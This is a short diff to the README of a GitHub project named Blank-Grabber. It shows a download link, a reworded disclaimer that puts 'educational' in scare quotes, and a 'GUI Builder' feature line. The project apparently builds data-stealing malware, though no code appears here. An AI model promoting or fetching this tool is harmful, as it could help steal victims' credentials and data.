Blank-c/Blank-Grabber/README.md

 ## Download
 [![Download](https://img.shields.io/badge/Download-Now-Green?style=for-the-badge&logo=appveyor)](https://github.com/Blank-c/Blank-Grabber/archive/refs/heads/main.zip)

-**Note:** This tool is for "educational" purpose only, and I am not responsible for any damage caused by this product in any way!
+**Note:** This tool is for "educational" purpose only, and I am not responsible for any damage caused by it in any way!

 ## Features
     • GUI Builder.